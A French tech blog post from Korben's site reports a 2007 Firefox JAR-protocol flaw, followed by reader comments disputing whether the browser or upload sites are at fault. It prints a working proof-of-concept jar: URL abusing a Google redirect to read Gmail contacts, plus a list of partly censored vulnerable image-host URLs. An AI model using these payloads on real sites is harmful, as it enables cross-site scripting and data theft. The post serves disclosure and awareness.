Entrez vos identifiants

x
OU
Vous avez oublié votre mot de passe ?
Utilisateur wiki : vous n'aviez pas d'email ?

Korben - Site d'actualité geek et tech

Go Top


Faille JAR, un premier Proof of Concept vient de sortir

Je vous avais parlé il y a quelques jours d'une nouvelle faille touchant Firefox et toutes les applications web qui acceptent de recevoir en upload des fichiers zip, jar ou odt, et doc 2007... Bref, tous les types de fichiers basés sur le protocole d'archivage JAR.

Trêve de blabla, voici un premier POC (Proof of Concept) qui démontre la gravité de la chose.

jar:http://groups.google.com/searchhistory/url?url=http://beford.org/stuff/htm.jar!/htm.htm

Si vous appelez ce lien (inoffensif je vous rassure), celui-ci executera un petit javascript qui fera croire à Google qu'il vient de son domaine (google.com) et qui lui ouvrira certaines portes comme par exemple ici l'accès à votre liste de contact Gmail. Ce script ne fait rien de méchant mais d'autres pourraient se servir de ces emails pour du spam par exemple.

Ca c'est pour le fun... maintenant, imaginez que vous vouliez récupérer la liste des fichiers ou des codes sources se trouvant dans un répertoire... En théorie, c'est possible aussi vu que le .htm contenu dans le JAR est exécuté comme si il était dans le dossier du site (donc comme si vous l'aviez envoyé directement en FTP)

Même chose en uploadant une fausse page internet d'une banque par exemple, on pourrait vous demander des informations confidentielles (ou en récupérer) sans que vous soyez vigilant.

Flippant non ?

Voici par exemple, une première liste de sites que le papa de la faille a testé et qui sont faillibles. Les noms de domaines sont censurés.

jar:http://imagXXXload.biz/files/dadfad6e3ba807aa20712fbe2.png!/test.html
jar:http://img3.freeimXXXhosting.net/uploads/328d2315c3.png!/test.html
jar:http://www.imglXXXtr.com/uploads/7accc832a7.png!/test.html
jar:http://upload.iXXXpot.com/u/07/311/05/test64864.zip.png!/test.html
jar:http://www.direcXXXload.com/showoriginal-32664.jpg!/test.html
jar:http://www.uplXXXhouse.com/fileuploads/712/712277d886fa0881092da4936f5ded10e771cd.png!/test.html
jar:http://www.fotopaXXXd.com/upload/nr/486/test.zip.png!/test.html
jar:http://www.uploXXXimages.net/imagen/18790b0b47.png!/test.html
jar:http://www.imaXXX.info/images/06/1194534977_test.zip.png!/test.html
jar:http://pics.fXXXni.de/save/p_1194532832.png!/test.html
jar:http://img.nXXXnternetstate.com/1194532968.png!/test.html

Evidement, pour le moment, c'est une grosse brêche encore ouverte parce que Firefox n'a pas encore été mis à jour. Prudence donc dans vos surfs à venir et attendez vous à voir une augmentation des alertes virales et des piratages dans les jours/mois qui vont arriver...

A bon entendeur...


Facebook Twitter Email Copier Url

10 Responses to “Faille JAR, un premier Proof of Concept vient de sortir”

  1. Zarathushtra dit :

    Ca n’a rien à voir avec l’article, mais quelqu’un pourrait m’expliquer ce qui se passe avec Demonoid ? Ils ont définitivement fermé cette fois-ci ?

  2. Koob dit :

    Merci pour l’info

  3. pihug12 dit :

    @Zarathushtra
    http://www.rlslog.net/demonoid-forcedly-shut-down-by-cria/
    Il a été mis hors ligne par la Canadian Recording Industry Association.

  4. mikeldj dit :

    pour en revenir à l’article, perso avec le lien que t’a donné, j’ai une page blanche et pis c’est tout !! :blink:

  5. Manu1400 dit :

    @admin : Comme d’habitude tu écris sans vraiment connaitre et si tu ne vérifie pas tes informations. La phrase “c??est une grosse brêche encore ouverte parce que Firefox n??a pas encore été mis à jour” est surrement fausse : La grosse brêche vient de la conception de certains sites et non de Firefox au dernière nouvelle. Firefox est lui aussi conserné par un problème de sécurité lié au JAR mais cette faille est peut critique (Secunia a classé cette dernière faille comme étant “Less Critical”). Source :
    http://secunia.com/advisories/27605/
    Merci de corriger l’article.

  6. mikeldj dit :

    y a pas à dire, il est sympa le Manu …
    à même se demander pourquoi il vient.. !!

  7. admin dit :

    Il n’y a rien de faux dans mon article. La faille est bien dans Firefox et effectivement dans les sites web qui autorisent l’upload de fichiers type JAR. Tout ça était expliqué dans l’article précédent sur le même sujet :-)

  8. Manu1400 dit :

    @admin : C’est peut être faux. Tu confond le problème de certains site et une faille non critique dans un navigateur web. Relis bien mon commentaire.

  9. Manu1400 dit :

    La faille contenue dans Firefox a été corrigé avec la version 2.0.0.10 de Firefox. Cette version corrige 2 autres failles.
    Cela dis, d’autres logiciels sont surrement une gestion problématique de JAR…

Dolby Audio Challenge – Coder pour le bonheur des oreilles

Capture du 2016-04-28 18:04:55

Si vous êtes développeur web en agence (par exemple) il vous arrive sûrement d'avoir dans votre Slack ou ailleurs des commandes pour des sites qui intègrent du son.

Pause
Wait, je sais le son en arrière plan d'une page web c'est bad really bad, mais là je parle d'autre chose.
End pause

Je veux parler de ces sites commandés à votre boîte par Warner, Universal, Ubisoft, où même toi dev freelance qui veut te faire un portfolio qui claque sa maman et qui ont besoin d'une bande son en arrière plan pour plonger l'internaute dans l'univers du jeu, trailer vidéo ou whatever.

B'hein en règle générale, c'est une mouise sans nom pour avoir un rendu sonore correct.
Pour pallier au problème Dolby a développé une techno qui est censée régler le problème et pour vous en faire la demo, ils vous invitent à la tester en participant à leur code challenge.

En y participant, vous aurez toutes les ressources nécessaires afin d'intégrer le nouveau son multi-dimensionnel (just marketing mais ça à l'air quand même cool) de Dolby. Accédez au hub où les développeurs Dolby animeront des tutoriels et webinars en one-to-one pour implémenter Dolby Digital Plus sur votre site.

A la clé un money pot de 15,000$.

Pour y participer où voir de plus près la techno pour les plus curieux c'est ici

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email
Rejoignez les 56895 korbenautes
et réveillez le bidouilleur qui est en vous
abonnez-vous en savoir plus
"Vous aimez bidouiller ?" Oui j'adore l'informatique et la technologie
Suivez Korben Un jour ça vous sauvera la vie.. Ou celle d'un(e) ami(e)
  • Rejoignez les 56895 bidouilleurs de la grande famille des Korbenautes
    «Je considère que votre email est aussi important que le mien.»
    Korben
  • Les Derniers Articles du Blog

  • Inscrivez vous aux bon plans

  •  
  • Site hébergé par
    Agarik Sponsor Korben
  • DANS TON CHAT (BASHFR)

    Kevin: lool vous ete con
    Oedipe: Tg Kevin...
    Kevin: va niké ta mer oedipe
    Oedipe: avec plaisir.

    -- http://danstonchat.com/11555.html
  • Un boitier externe pour booter des ISO à

    gogo sans se prendre la tête

    Il s'agit d'un boitier externe pour disque dur 2,5" fabriqué par la société Zalman, qui a la particularité d'avoir un petit écran de contrôle et qui permet de choisir l'ISO sur laquelle vous souhaitez booter...lire la suite

    Microsoft récupère vos clés de chiffrement.

    Voici comment les en empêcher

    Si vous avez acheté un appareil sous Windows 10 équipé d'une puce qui chiffre par défaut le disque, ne vous pensez pas en sécurité pour autant : La clé de récupération qui vous permet de déchiffrer vos données...lire la suite

    En ce moment dans l'univers "Raspberry Pi"

    Voir tous les articles »